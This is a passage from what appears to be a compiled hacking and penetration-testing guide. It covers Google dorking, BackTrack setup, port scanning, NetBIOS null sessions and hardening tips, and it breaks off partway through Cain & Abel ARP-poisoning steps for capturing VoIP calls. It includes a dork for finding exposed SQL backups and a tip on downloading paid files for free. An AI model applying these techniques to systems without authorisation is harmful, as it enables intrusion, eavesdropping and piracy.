From this image you can see that the ICMP echo requests are timed out after seven requests. TCP Traceroute Many devices are configured to block ICMP traceroutes. This is where we try TCP or UDP traceroutes, also known as layer 4 traceroutes. TCP traceroute is by default available in BackTrack. If you can’t find it, just use the following command: apt-get install tcptraceroute Usage From the command line, you would need to issue the following command: tcptraceroute www.google.com UDP Traceroute Linux also has a traceroute utility, but unlike Windows, it uses UDP protocol for the traceroute. In Windows, the command for traceroute is “tracrt”. In, Linux, it’s “tracroute”. Usage traceroute www.target.com NeoTrace

Mail:mtahirzahid@yahoo.com

Page 79


Power Of Hacking NeoTrace is a very fine GUI-based tool for mapping out a network.

Cheops-ng Cheops-ng is another remarkable tool for tracing and fingerprinting a network. This image speaks

a thousand words. Google Hacking:Google searches can be more than a treasure for a pentester, if he uses them effectively. With Google searches, an attacker may be able to gather some very interesting information, including passwords, on the target. Google has developed a few search parameters in order to Mail:mtahirzahid@yahoo.com

Page 80


Power Of Hacking improve targeted search. However, they are abused by hackers to search for sensitive information via Google. Some Basic Parameters Site The site parameter is used to search for all the web pages that are indexed by Google. Webmasters have the option of specifying what pages should or should not be indexed by Google, and this information is saved in the robots.txt file, which an attacker can easily view. Example

www.tahirhacker.com/robots.txt As you can see from this screenshot the Webmaster has disallowed some directories from being indexed. Sometimes, you may find some interesting information in them such as admin pages and other sensitive directories that the webmaster would not like the search engines to crawl. Coming back to the site parameter, let’s take a look at its usage. Usage Site: www.tahirhacker.com This query will return all the web pages indexed by Google. Link: Link: www.tahirhacker.com This search query will return all the websites that have linked to techlotips.com. These websites may contain some interesting information regarding the target. Intitle: Mail:mtahirzahid@yahoo.com

Page 81


Power Of Hacking Intitle keyword is used to return some results with a specific title. Usage Site: www.tahirhacker.com Intitle:ftp users This query will return all the pages from techlotips that contain the title “ftp users� Note: This usage query is just for demonstration as it may not work in most cases. Inurl: Inurl is a very useful search query. It can be used to return URLs with specific keywords. Site: www.tahirhacker.com inurl:ceo names This query will return all URLs with the given keyword. Filetype: Site: www.msn.com filetype:pdf You can also ask Google to return specific files such as PDF and .docx by using the filetype

query. TIP regarding Filetype Lots of Webmasters of websites that sell e-books and other products forget to block the URL from being indexed. Using filetype, you can search for these files, and if you are lucky, you may be able to download products for free.

Mail:mtahirzahid@yahoo.com

Page 82


Power Of Hacking Here is the table that summarizes the Google dorks along with their functions:

Google Hacking Database:Google hacking database is set up by the offensive security guys, the ones behind the famous BackTrack distro. Google hacking database has a list of many Google dorks that could be used to find usernames, passwords, e-mail list, password hashes, and other important information.

So let’s just ask the website to filter out all the Google dorks related to files that contain passwords. From the drop-down menu, select the option “Files containing passwords.” Now, you

Mail:mtahirzahid@yahoo.com

Page 83


Power Of Hacking would see a list of all the dorks that could be used to find passwords. Let’s try one of them.

Out of all other dorks, filetype:sql inurl:wp-content/backup-* seemed to be really interesting to me, so I gave it a try on Google. Since MySQL passwords are also backed up with other files, due to the incorrect permissions, it may reveal some interesting information. What the above query is asking to SQL files with URL pattern wp-content/backup. Fortunately, with a little bit of searching. I was able to find a “Wordpress mysql database” of a website exposed to the public.

Hackersforcharity.org/ghdb Another database that contains a collection of some interesting Google dorks. Mail:mtahirzahid@yahoo.com

Page 84


Power Of Hacking

Xcode Exploit Scanner Xcode exploit scanner is an automated tool that uses some common Google dorks to scan for vulnerabilities such as SQLI and XSS.

Nslookup:Nslookup is available in both Windows and Linux OS. Let’s say that we want the DNS servers to return all the mail server records of an organization. We would do the following: Step 1—Issue the nslookup command from the command prompt. Step 2—Issue the following command: set type = mx Step 3—Next, we would enter the domain.

Mail:mtahirzahid@yahoo.com

Page 85


Power Of Hacking www.msn.com

The query returned mail servers for msn.com. We can also ask for all the DNS servers for that domain by using the set type = ns command.

The query has returned all the name servers associated with ifixit.com. Linux Basics:Subdirectories of the root directory: Directory Content /bin Common programs, shared by the system, the system administrator, and the users. /boot The startup files and the kernel, vmlinuz. In some recent distributions also grub data. Grub is the GRand Unified Boot loader and is an attempt to get Mail:mtahirzahid@yahoo.com

Page 86


Power Of Hacking rid of the many different boot-loaders we know today. /dev Contains references to all the CPU peripheral hardware, which are represented as files with special properties. /etc Most important system configuration files are in/etc., this directory contains data similar to those in the Control Panel in Windows /home Home directories of the common users. /initrd (on some distributions) Information for booting. Do not remove! /lib Library files, includes files for all kinds of programs needed by the system and the users. /lost+found Every partition has a lost+found in its upper directory. Files that were saved during failures are here. /misc For miscellaneous purposes. /mnt Standard mount point for external file systems, for example, a CD-ROM or a digital camera. /net Standard mount point for entire remote file systems. /opt Typically contains extra and third-party software. /proc

Mail:mtahirzahid@yahoo.com

Page 87


Power Of Hacking A virtual file system containing information about system resources. More information about the meaning of the files in proc is obtained by entering the command man proc in a terminal window. The file proc.txt discusses the virtual file system in detail. /root The administrative user’s home directory. Mind the difference between /, the root directory and /root, the home directory of the root user. /sbin Programs for use by the system and the system administrator. /tmp Temporary space for use by the system, cleaned upon reboot, so don’t use this for saving any work! /usr Programs, libraries, documentation, etc., for all user-related programs. /var Storage for all variable files and temporary files created by users, such as log files, the mail queue, the print spooler area, space for temporary storage of files downloaded from the Internet, or to keep an image of a CD before burning it. Most Common and Important Commands ls: list directory contents cd: changes directories rm: remove files or directories chmod: change file mode bits, from read to write and vise versa chown: change ownership of a file chgrp: change group ownership screen: screen manager with VT100/ANSI terminal emulation, create background process

Mail:mtahirzahid@yahoo.com

Page 88


Power Of Hacking with terminal emulator. ssh: secure shell for remote connection man: manual/help pwd: print name of current/working directory. cd..: moves up one directory mkdir: create a new directory rmdir: remove director locate: find a file with in directory or system whereis: find a file with in system cp: copy file mv: move file/directory or rename a file or directory mount: mount device such as cdrom/usb zip: compress directory/files umount: umount(eject) the usb df: list partation table cat: concatenate the file ifconfig: show interface details w: Show who is logged on and what they are doing top: show system task manager netstat: show local or remote established connection nslookup: query Internet name servers interactively dig: dns utility touch: create a file nano: file editor vi: vim file editor free -h: check free memoryruns. What Is BackTrack?

Mail:mtahirzahid@yahoo.com

Page 89


Power Of Hacking So now that you are familiar with Linux, let me introduce you to BackTrack. BackTrack is a Linux penetration testing distro developed by Offensive Security especially for ethical hackers and penetration testers. It contains all the popular tools and software used for pen testing a variety of services, networks, and devices. BackTrack 5 is the latest version of the Linux penetration testing distro at the time of writing this . It comes in two flavors: Gnome and KDE. Gnome is an Ubuntu-based Linux operating system that has officially been introduced only in the latest version of BackTrack. Here is a

screenshot of BackTrack 5. BackTrack 5 Running

How to Get

Now that you have a basic idea of what BackTrack is and why it is used, it’s time to install BackTrack on our box and get things going. There are many ways you can get BackTrack up and running. I install BackTrack on a virtualization software such as VMware or virtual box. Personally, I am a fan of virtual box, since it does not take much of my computer’s memory. Therefore, what we will learn next is how to install BackTrack on virtual box. Installing BackTrack on Virtual Box There are times when we need to switch between operating systems rapidly and we need our BackTrack running alongside another OS like Windows or Red Hat Linux. One advantage of doing this is it gives us more accessibility. For doing this you need to download VM Virtual Box, which is a freely available tool. Step 1—After downloading and installing virtual box on to your PC, click on the “New” button. A dialogue box will appear where you would need to type the name of the “OS,” the “Version,” and the operating system type. In my case the name would be “BackTrack,” the

Mail:mtahirzahid@yahoo.com

Page 90


Power Of Hacking OS “Linux,” and the version “Ubuntu.”

Step 2—The next step would be to allocate the RAM; it is recommended that you allocate at least 1024 MB (1 GB) for BackTrack to run perfectly.

Step 3—Next, choose to create a virtual drive and then in the next window select the hard drive

Mail:mtahirzahid@yahoo.com

Page 91


Power Of Hacking

type as VDI (Virtual Disk Image).

Step 4—In the next step, you have to choose if you want the hard disk to be dynamically allocated or have a fixed size. If you have enough space on your hard disk, you might want to choose the first option. Nevertheless, it’s up to you.

Step 5—Next, choose the name of your virtual hard drive and allocate the size of the hard disk.

Mail:mtahirzahid@yahoo.com

Page 92


Power Of Hacking

Step 6—So, now when the virtual hard disk has been created and other settings are selected, load the BackTrack that was downloaded onto the virtual box and click “Start”.

That’s all we need to do. We now have BackTrack installed on our virtual box. Installing BackTrack on a Portable USB BackTrack can also be made portable by installing it on to a USB flash drive. This way you can carry BackTrack Live anywhere. This practice is useful for outsource penetration tests and, moreover, it is very easy to make BackTrack USB. Mail:mtahirzahid@yahoo.com

Page 93


Power Of Hacking For this you need the following: ◾USB flash drive (minimum 8 GB) ◾A disk burning software For this purpose, we are going to use PowerISO, which is freely available online at http://www. poweriso.com Step 1—Format your flash drive and ensure that it has at least 7 GB of free space.

Step 2—Open PowerISO from the “Start” menu. Step 3—Click on “Tools” and from the dropdown list select “Make a bootable USB.”

Step 4—The following dialogue box will appear.

Mail:mtahirzahid@yahoo.com

Page 94


Power Of Hacking

Step 5—Locate your BackTrack ISO disk image.

Step 6—Now it will start burning the image on to your USB drive.

Mail:mtahirzahid@yahoo.com

Page 95


Power Of Hacking

Step 7—When the process is complete, the following message appears.

Installing BackTrack on Your Hard Drive If you run BackTrack from VMware or virtual box, any changes you made would be removed after rebooting; to solve this issue, we need to install BackTrack on the hard drive. For this, we need two things: 1. BackTrack Live CD or BackTrack installed on VMware or virtual box. 2. A hard drive with minimum 20 GB free space. Step 1—Insert the disk into the drive and boot from it. This is what you will see in the beginning:

Mail:mtahirzahid@yahoo.com

Page 96


Power Of Hacking

Step 2—Then you will see the screen root@bt:, where you will have to type the command “startx”.

Step 3—Now that we have booted into BackTrack, we will install it on our hard drive. Click on the icon “Install BackTrack” and your installation should start.

Step 4—On the Welcome screen, you will have to select the appropriate language and click

Mail:mtahirzahid@yahoo.com

Page 97


Power Of Hacking

“Forward”. Step 5—Now select your time zone. Or, if you are already connected to the network, your time

zone will automatically be detected. Step 6—Now a window to select the desired keyboard layout appears.

Mail:mtahirzahid@yahoo.com

Page 98


Power Of Hacking

Step 7—Next we will have to set the partition size. In most cases we leave it to default and the

entire partition is erased. Step 8—Now the install summary appears and you just have to click on “Install” and your

Mail:mtahirzahid@yahoo.com

Page 99


Power Of Hacking

work is done. installer will take some time to complete, which may be several minutes.

The

After the installation is complete, you will be prompted to restart your PC and as you reset your BackTrack, it will be installed to your hard drive.

BackTrack Basics Once you have BackTrack up and running, it’s time to learn about BackTrack basics. By the time you are reading this book, BackTrack would have been upgraded to version 6 or 7, and you might be wondering if the techniques discussed work only for BackTrack 5. If so, then you are wrong. Starting from BackTrack 1 all the way to BackTrack 5, the only thing that changed were the Mail:mtahirzahid@yahoo.com

Page 100


Power Of Hacking tools. Outdated tools are removed and new tools are added, but the structure and fundamentals stay the same. One of the common problems I see with beginners is that they tend to use the KDE menu a lot. I suggest you stay away from the KDE menu and try to use the command line before jumping to the KDE menu. I want you to familiarize yourself with BackTrack’s environment as it will be discussed in many of the upcoming chapters, especially in the later chapters of this book. Taking you back to BackTrack, the /pentest directory is by far the most important directory present in BackTrack as it has all the penetration testing tools. To access the pentest directory of BackTrack, open up your shell and type “cd/pentest” and then type “ls”. “ls” will get you into all the subdirectories present in the pentest directory.

Changing the Default Screen Resolution The default size of the BackTrack 5 screen is 800 by 600, which is very small and is not recommended. If you want to change your BackTrack 5 (KDE) default screen size, then just follow these steps: Step 1—Go to Start → Settings → System Settings Step 2—Then from the hardware section click on “Display and Monitor”

Step 3—Next choose your preferred size and click “Ok”. A dialog box will now appear asking

Mail:mtahirzahid@yahoo.com

Page 101


Power Of Hacking you to confirm the changes. Just click “Accept Configuration” and you are done.

Some Unforgettable Basics Changing the Password We would need to issue the following command in order to change the password of our Linux box. Generally, it’s a good practice to change the default password to prevent unscrupulous people from getting into the network. This is the reason I have kept this command at the top of the basics list. passwd Clearing the Screen In Windows command prompt we use “cls”; inside Linux BackTrack we use the clear command. Listing the Contents of a Directory ls ls is used for listing the contents in a directory, the –l parameter can also be used for listing the permissions of the current directory. Displaying Contents of a Specific Directory ls/pentest/enumeration It is used to list the contents of a specific directory. Issuing this command generates a list of the contents of the /pentest/enumeration directory. Displaying the Contents of a File cat password.txt Mail:mtahirzahid@yahoo.com

Page 102


Power Of Hacking This command lists the contents of the passwords file. Creating a Directory mkdir directoryname The process is the same as in Windows. Changing the Directories cd/pentest/enumeration Changing the directories is very simple. It works as in Windows. However, we use / in Linux instead of \ for changing the directories. Windows C:/windows/settings Linux /pentest/web/scanners Creating a Text File touch hack.txt This command creates a text file with the name hack.txt. Copying a File Cp source target cp /var/www/filename /pentest/web/filename This command will copy the file from the /var/www directory to the /pentest/web/ directory. Current Working Directory pwd This will return the current working directory. Renaming a File mv oldfile.txt newfile.txt There is no command specifically for renaming files inside Linux; however, you just need to issue the mv command to rename the file. Moving a File

Mail:mtahirzahid@yahoo.com

Page 103


Power Of Hacking mv hack.txt/pentest/enumeration/ This command will move the file hack.txt to the /pentest/enumeration directory. Removing a File rm file name This is very simple, and it works for directories in the same way. Locating Certain Files inside BackTrack Let’s say we are searching for “TheHarvester” tool and we don’t know in which directory it exists. We can use the locate command to find it. Example locate harvester

Text Editors inside BackTrack BackTrack by default does not have any fancy text editors like Notepad in Windows. It has some text editors that we can use within the command line such as nano, pico, and vim. However, if you want to use a text editor that is equivalent to Notepad in Windows, I would recommend you use kate or gedit. In order to install them, you would need to issue the following commands from the command line: apt-get install gedit apt-get install kate These commands will automatically search the Internet and download the packages and Mail:mtahirzahid@yahoo.com

Page 104


Power Of Hacking dependencies. Getting to Know Your Network The first thing that we need to check when we are on BackTrack is that if we have a valid IP address. If you type the command “ifconfig� in your command line, it will list all of your current configurations.

As you can see from the screenshot, the local IP is 192.168.75.130 and the subnet mask is 255.255.255.0; you can also see other configurations including network interfaces. Dhclient By running the command Dhclient followed by the interface on the terminal, a new static IP address will automatically be assigned by DHCP. However, if for any reason this method does not work for you, you can start networking by issuing the following command:

Mail:mtahirzahid@yahoo.com

Page 105


Power Of Hacking root@bt:~# /etc/init.d/networking start

Services BackTrack has a variety of useful services such as Apache and MySQL that are disabled by default. You can enable these services by issuing various commands on your console. Note: Before starting any services such as SSH, you should consider changing your root password, which is “toor” by default to prevent hackers and other unscrupulous people to get into your network. MySQL By default the MySQL service runs in your BackTrack 5 OS. You can easily start or stop the service by issuing the following init.d script: Start—/etc/init.d/mysql start Stop—/etc/init.d/mysql stop SSHD SSH functions the same way as the FTP protocol. However, it is used for secure file sharing as the data being sent and received is encrypted. So it’s considered more secure than ftp. However, weaknesses have also been identified in SSHD clients though it’s relatively more secure than FTP. In order to start an SSH server, first you need to generate SSH keys. You can generate SSH keys

Mail:mtahirzahid@yahoo.com

Page 106


Power Of Hacking by simply issuing the following command in your console.

Let’s now connect to your SSH server from your Windows operating system. In order to do that you would need an SSH client such as putty. Step 1—Run the following command in order to start the SSH server on your BackTrack. /etc/init.d/ssh start You can verify if SSH is running by typing the following command: netstat –ano | grep 22

Next, type “ifconfig” from your terminal to obtain your IP address. Step 2—Open up putty on your Windows operating system. Type your BackTrack IP address

Mail:mtahirzahid@yahoo.com

Page 107


Power Of Hacking

and connect to port 22. 3—Now it will ask you for your credentials. Enter “root” as username and “toor” as

Step

password in case you haven’t changed the default credentials. Step 4—Once you have entered the credentials, you will be inside the BackTrack console; now you can run BackTrack from your Windows.

Postgresql By default, BackTrack 5 box does not come with postgresql. However, Metasploit does support postgresql databases. In order to install postgresql, we need to issue the following command in the console. apt–get install postgresql Once postgresql is successfully installed on your BackTrack 5 box, all you need to do is issue the following service init script in order to start the postgresql service. /etc/init.d/postgresql start Mail:mtahirzahid@yahoo.com

Page 108


Power Of Hacking However, if you are still facing problems in getting postgresql up and running, don’t worry. We shall get to it once we reach the “Remote exploitation” chapter of this book. BackTrack 5 also offers a wide variety of other services, such as tftpd and apache, which you can also run from the command line and which are also present in the KDE menu. The services are present in the BackTrack → Services tab in the main menu.

Other Online Resources ◾http://Linux.org ◾http://beginLinux.org ◾http://Linux-tutorial.info ◾BackTrack-Linux.org SuperScan:My favorite tool for performing generic TCP port scans is SuperScan version 3.0. Don’t laugh because it’s so old! It’s reliable, which goes a long way in my book. Figure 8-2 shows the results of my scan and a few interesting ports

Mail:mtahirzahid@yahoo.com

Page 109


Power Of Hacking open on several hosts, including Windows Terminal Server and SSH.

Only Scan Responsive Pings and All Selected Ports in List options. However, you might want to select some other options: ✓ If you don’t want to ping each host first, deselect the Only Scan Responsive Pings option. ICMP can be blocked, which can cause the scanner not to find certain hosts, so this option can make the test run more efficiently. ✓ If you want to scan a certain range of well-known ports or ports specific to your systems, you can configure SuperScan to do so. I recommend these settings: • If you want to perform a scan on well-known ports, at least select the All Selected Ports in List option. • If this is your initial scan, scan all ports from 1 to 65,535. NetScanTools Pro:NetScanTools Pro (www.netscantools.com) is a nice all-in-one commercial tool for gathering general network information, such as the number of unique IP addresses, NetBIOS names, and MAC addresses. It also has a neat feature that allows you to fingerprint the operating systems of various hosts. Figure

Mail:mtahirzahid@yahoo.com

Page 110


Power Of Hacking 8-4 shows the OS fingerprint results while scanning a Linksys router/firewall.

Countermeasures against ping sweeping and port scanning Enable only the traffic you need to access internal hosts — preferably as far as possible from the hosts you’re trying to protect — and deny everything else. This goes for standard ports, such as TCP 80 for HTTP and ICMP for ping requests. You apply these rules in two places: ✓ External router for inbound traffic ✓ Firewall for outbound traffic Configure firewalls to look for potentially malicious behavior over time (such as the number of packets received in a certain period of time), and have rules in place to cut off attacks if a certain threshold is reached, such as 10 port

Mail:mtahirzahid@yahoo.com

Page 111


Power Of Hacking scans in one minute or 100 consecutive ping (ICMP) requests. Most firewalls and IDSes/IPSes can detect such scanning and cut it off in real time. You can break applications on your network when restricting network traffic, so make sure that you analyze what’s going on and understand how applications and protocols are working before you disable any type of network traffic. Banner grabbing:Banners are the welcome screens that divulge software version numbers and other system information on network hosts. This banner information might identify the operating system, the version number, and the specific service packs to give the bad guys a leg up on attacking the network. You can grab banners by using either good old telnet or some of the tools I mention, such as Nmap and SuperScan. telnet You can telnet to hosts on the default telnet port (TCP port 23) to see whether you’re presented with a login prompt or any other information. Just enter the following line at the command prompt in Windows or UNIX: telnet ip_address You can telnet to other commonly used ports with these commands: ✓ SMTP: telnet ip_address 25 ✓ HTTP: telnet ip_address 80

✓ POP3: telnet ip_address 110 System scanning:A few straightforward processes can identify weaknesses in Windows systems. Mail:mtahirzahid@yahoo.com

Page 112


Power Of Hacking Testing Start gathering information about your Windows systems by running an initial port scan: 1. Run basic scans to find which ports are open on each Windows system: • Scan for TCP ports with a port scanning tool, such as SuperScan. The SuperScan results in Figure 10-1 show several potentially vulnerable ports open on a Windows Server 2003 system, including those for a Web server (port 80), and the ever-popular — and

easily hacked — NetBIOS (port 139). Perform OS enumeration (such as scanning for shares and specific OS

2.

versions) by using an all-in-one assessment tool, such as LANguard. Figure 10-2 shows a LANguard scan that reveals the server version,

Mail:mtahirzahid@yahoo.com

Page 113


Power Of Hacking vulnerabilities, open ports, and more.

If you need to quickly identify the specific version of Windows that’s running, you can use Nmap (http://nmap.org/download.html) with the -O option(Using Nmap to deter-mine the Windows version)

Other OS fingerprinting tools are available, but I’ve found Nmap to be the most accurate. 3. Determine potential security vulnerabilities. This is subjective and might vary from system to system, but what you want to look for are interesting services and applications and proceed from there. Countermeasures against system scanning You can prevent an external attacker or malicious internal user from gathering certain information about your Windows systems by implementing the proper security settings on your network and on the Windows hosts. You

Mail:mtahirzahid@yahoo.com

Page 114


Power Of Hacking have the following options: ✓ Use a network firewall. ✓ Use the Windows Firewall or other personal firewall software on each system. You want to block the Windows networking ports for RPC (port 135) and NetBIOS (ports 137–139 and 445). ✓ Disable unnecessary services so that they don’t appear when a connection is made. NetBIOS You can gather Windows information by poking around with NetBIOS (Network Basic Input/Output System) functions and programs. NetBIOS allows applications to make networking calls and communicate with other hosts within a LAN These Windows NetBIOS ports can be compromised if they aren’t properly secured: ✓ UDP ports for network browsing: • Port 137 (NetBIOS name services) • Port 138 (NetBIOS datagram services) ✓ TCP ports for Server Message Block (SMB): • Port 139 (NetBIOS session services) • Port 445 (runs SMB over TCP/IP without NetBIOS) Hacks The hacks described in the following two sections can be carried out on unprotected systems running NetBIOS. Unauthenticated enumeration When you’re performing your unauthenticated enumeration tests, you can gather configuration information about the local or remote systems two ways: Mail:mtahirzahid@yahoo.com

Page 115


Power Of Hacking ✓ All-in-one scanners, such as LANguard or QualysGuard ✓ The nbtstat program that’s built in to Windows (nbtstat stands for NetBIOS over TCP/IP Statistics) Figure 10-4 shows information that you can gather from a Windows 7 system with a simple nbtstat query.

nbtstat shows the remote computer’s NetBIOS name table, which you gather by using the nbtstat -A command. This displays the following information: ✓ Computer name ✓ Domain name ✓ Computer’s MAC address When running nbtstat against a Windows NT or Windows 2000 server, you might even glean the ID of the user who’s currently logged in. An advanced program such as LANguard isn’t necessary to gather this basic information from a Windows system. However, the graphical interface offered by commercial software such as this presents its findings in a prettier fashion and is often much easier to use. Additionally, you have the benefit of gathering the information you need with one tool. Shares Windows uses network shares to share certain folders or drives on the system so other users can access them across the network. Shares are easy

Mail:mtahirzahid@yahoo.com

Page 116


Power Of Hacking to set up and work very well. However, they’re often misconfigured, allowing hackers and other unauthorized users to access information they shouldn’t be able to get to. You can search for Windows network shares by using the Share Finder tool built in to LANguard. This tool scans an entire range of IP addresses, looking for Windows shares.

The shares displayed in Figure 10-5 are just what malicious insiders are looking for because the share names give a hint of what type of files might be accessible if they connect to the shares. After the bad guys discover these shares, they’re likely to dig a little further to see whether they can browse the files within the shares. I cover shares and rooting out sensitive information on network shares and other storage devices in Chapter 15. Countermeasures against NetBIOS attacks You can implement the following security countermeasures to minimize NetBIOS and NetBIOS over TCP/IP attacks on your Windows systems: ✓ Use a network firewall.

Mail:mtahirzahid@yahoo.com

Page 117


Power Of Hacking ✓ Use the Windows Firewall or other personal firewall software on each system. ✓ Disable NetBIOS — or at least Windows File and Printer Sharing. Disabling NetBIOS might not be practical in a network where users and applications depend on file sharing or in a mixed environment where older Windows 2000 and NT systems rely on NetBIOS for file and printer sharing. ✓ Educate your users on the dangers of enabling file shares for everyone to access. I cover these risks in detail in Chapter 15. Hidden shares — those with a dollar sign ($) appended to the end of the share name — don’t really help hide the share name. Any of the tools I’ve mentioned can see right through this form of security by obscurity. Mapping:To map a null session, follow these steps for each Windows computer to which you want to map a null session: 1. Format the basic net command, like this: net use \\host_name_or_IP_address\ipc$ “” “/user:” The net command to map null sessions requires these parameters: • net (the built-in Windows network command) followed by the use command • IP address or hostname of the system to which you want to map a null connection • A blank password and username The blanks are why it’s called a null connection. 2. Press Enter to make the connection. Figure shows an example of the complete command when mapping a null session. After you map the null session, you should see the mesMail:mtahirzahid@yahoo.com

Page 118


Power Of Hacking sage The command completed successfully.

To confirm that the sessions are mapped, enter this command at the command prompt: net use As shown in Figure 10-6, you should see the mappings to the IPC$ share on each computer to which you’re connected. Linux Vulnerabilities Vulnerabilities and attacks against Linux are creating business risks in a growing number of organizations — especially e-commerce companies, network product vendors, and ISPs that rely on Linux for many of their systems. When Linux systems are hacked, the victim organizations can experience the same side effects as their Windows-using counterparts, including: ✓ Leakage of sensitive information ✓ Cracked passwords ✓ Corrupted or deleted databases ✓ Systems taken completely offline Choosing Tools You can use many UNIX-based security tools to test your Linux systems. Some are much better than others. I often find that my Windows-based commercial tools do as good a job as any. My favorites are as follows: ✓ Windows-based SuperScan version 3 (www.foundstone.com/ resources/proddesc/superscan3.htm) for ping sweeps and TCP port scanning Mail:mtahirzahid@yahoo.com

Page 119


Power Of Hacking ✓ Nmap (http://nmap.org) for OS fingerprinting and more detailed port scanning ✓ Windows-based LANguard (www.gfi.com/lannetscan) for port scanning, OS enumeration, and vulnerability testing ✓ THC-Amap (http://freeworld.thc.org/thc-amap) for application version mapping ✓ Tiger (ftp://ftp.debian.org/debian/pool/main/t/tiger) for automatically assessing local system security settings ✓ Linux Security Auditing Tool (LSAT) (http://usat.sourceforge. net) for automatically assessing local system security settings ✓ QualysGuard (www.qualys.com) for OS fingerprinting, port scanning, and very detailed and accurate vulnerability testing ✓ Nessus (www.nessus.org) for OS fingerprinting, port scanning, and vulnerability testing ✓ BackTrack (www.remote-exploit.org/backtrack.html) toolset on a bootable CD or .iso image file Hundreds if not thousands of other Linux hacking and testing tools are available on such sites as SourceForge.net (http://sourceforge.net) and freshmeat.net (http://freshmeat.net). The key is to find a set of tools — preferably as few as possible — that can do the job that you need to do and that you feel comfortable working with. Port scanning:Start testing your NetWare systems by performing an initial port scan to check what hackers can see. You can perform these scans in two ways: ✓ If the server has a public IP address, scan from outside the firewall, if possible. ✓ If the server doesn’t have a public IP address, you can scan internally on Mail:mtahirzahid@yahoo.com

Page 120


Power Of Hacking the network. The bad guys can be inside your network, too! The SuperScan results in Figure show several potentially vulnerable ports open on this NetWare server, including FTP and the commonly exploited Echo and Character Generator ports. In addition, the NetWare-specific port 524 is NCP (NetWare Core Protocol). NetWare uses this protocol for its internal communications with hosts, such as clients and other servers — similar to SMB in

Windows. also find that GroupWise is running (TCP/UDP port 1677), as well

You might

as a Web server and other Web-based remote-access ports, such as 80, 443, 2200, 8008, and 8009. You can also perform a scan with LANguard Network Security Scanner. Using a commercial tool such as this can often provide more details about the systems you scan than a basic port scanner can. Figure 12-2 shows that LANguard can determine more information about the server, such as the NetWare version and SNMP information. This is another good use for the SNMP enumeration tool Getif (www.wtcs.org/snmp4tpc/getif.htm), which I describe in Chapter 8. It also tells you what’s listening on the open

Mail:mtahirzahid@yahoo.com

Page 121


Power Of Hacking

ports without you having to look them up. overlook QualysGuard (www.qualys.com) as a good NetWare security

Don’t

testing tool. This tool tests for a handful of NetWare-specific vulnerabilities related to the NetWare Enterprise Web Server and other abend (a Novell term that stands for abnormal end) issues that most other tools simply don’t catch. Minimizing NetWare Security Risks:Although you can’t completely defend NetWare servers against attacks, you can come pretty close, which is an improvement over other “leading” operating systems. These NetWare hacking countermeasures can help improve security on your NetWare server beyond what I’ve already recommended. Rename admin Rename the admin account. Figure shows how this can be done in the

Mail:mtahirzahid@yahoo.com

Page 122


Power Of Hacking Novell ConsoleOne utility.

Be careful when renaming the admin account, though. Other applications, such as the server backup software, might depend on the admin ID. If you rename admin, be sure to edit any backup jobs or startup scripts that depend on the admin account name. It’s best to not use the admin account for backup and other administrative tasks anyway, so this might be a good time to make a change by creating an admin equivalent for each application that depends on an admin ID. Creating these equivalents can help make your system more secure by reducing the number of places that the admin account is exposed and vulnerable to cracking on the network. Disable eDirectory browsing Disabling Public’s right to browse the directory tree in either NetWare Administrator for NetWare 4.x or Novell ConsoleOne for NetWare 5.x and later is a good way to ward off attacks. This right is enabled by default to allow users to browse the eDirectory tree easily. Disabling the Public Browse right or any other eDirectory or file rights can cause problems, such as locking users (including you) out of the network, disabling login scripts, and disabling printing. The potential risk depends on how Mail:mtahirzahid@yahoo.com

Page 123


Power Of Hacking you configure eDirectory. If you remove Public’s Browse right, you can usually grant specific object rights lower in the tree, where they’re needed to keep everything working. Make sure that you test these types of critical changes before applying them to your production environment. NetWare Administrator Follow these steps to disable the Public Browse right to eDirectory with NetWare Administrator (sys:\public\win32\nwadmn32.exe): 1. Right-click the Root object in your directory tree. 2. Choose Trustees of This Object. 3. Select the [Public] trustee, as shown in Figure . 4. In the Object Right section, deselect the Browse check box. 5. Click OK.

Novell ConsoleOne Follow these steps to disable the Public Browse right to eDirectory with Novell ConsoleOne (sys:\public\mgmt\ConsoleOne\1.2\bin\ ConsoleOne.exe): 1. Right-click your tree object.

Mail:mtahirzahid@yahoo.com

Page 124


Power Of Hacking 2. Choose Trustees of This Object. 3. Select the [Public] trustee and then click Assigned Rights. 4. In the Rights section, deselect the Browse check box, as shown in Figure . 5. Click OK twice.

Remove bindery contexts Remove any bindery contexts loaded on your server. Bindery contexts are in place in NetWare 4.x and later to provide backward compatibility with older clients that need to access the servers as though they’re NetWare 3.x or earlier servers. This is typically present (and necessary) for older applications or NetWare clients (such as netx and VLMs) that make bindery calls instead of eDirectory calls. Removing bindery contexts can help prevent hacker attacks against bindery weaknesses. To disable the bindery context on your server, simply comment out the set Bindery Context line in your server’s autoexec.ncf file using a # sign. If you remove your bindery contexts, make sure that no clients or applications Mail:mtahirzahid@yahoo.com

Page 125


Power Of Hacking depend on NetWare bindery emulation. Audit the system Turn on system auditing by running auditcon at a command prompt. This program can help you track down a future intruder by auditing files, volumes, and even the directory tree. It’s just a good security practice, as well. TCP/IP parameters In NetWare 5.x and above, based on your specific version, you can prevent several types of DoS attacks by entering the following TCP/IP parameters at the server console: set discard oversized ping packets=on set discard oversized UDP packets=on set filter subnet broadcast packets=on set filter packets with IP header options=on set ipx netbios replication option=0 set tcp defend land attacks=on set tcp defend syn attacks=on You can enter the preceding commands into the server’s autoexec.ncf file so that they load each time the server starts. Patch Patch, patch, and patch again! Novell lists the latest patches for the NetWare versions it supports on its Web site: http://download.novell.com

Capturing and recording voice traffic:If you have access to the wired or wireless network, you can capture VoIP conversations easily. This is a great way to prove that the network and the VoIP installation are vulnerable. There are many legal issues associated with

Mail:mtahirzahid@yahoo.com

Page 126


Power Of Hacking tapping into phone conversations, so make sure you have permission and are careful not to abuse your test results. You can use Cain & Abel (technically just Cain for the features I demonstrate here) to tap into VoIP conversations. You can download Cain & Abel free at www.oxid.it/cain.html. Using Cain’s ARP poison routing feature, you can plug in to the network and have it capture VoIP traffic: 1. Load Cain & Abel and then click the Sniffer tab to enter the network analyzer mode. The Hosts page opens by default. 2. Click the Start/Stop APR icon (it looks like the nuclear waste symbol). The ARP poison routing process starts and enables the built-in sniffer. 3. Click the blue + icon to add hosts to perform ARP poisoning on. 4. In the MAC Address Scanner window that appears, ensure that All Hosts in My Subnet is selected and then click OK. 5. Click the APR tab (the one with the yellow-and-black circle icon) to load the APR page. 6. Click the white space under the uppermost Status column heading (just under the Sniffer tab). This re-enables the blue + icon. 7. Click the blue + icon and the New ARP Poison Routing window shows the hosts discovered in Step 3. 8. Select your default route or other host that you want to capture packets traveling to and from. I just select my default route, but you might consider selecting your SIP manager or other central VoIP system. The right column fills with 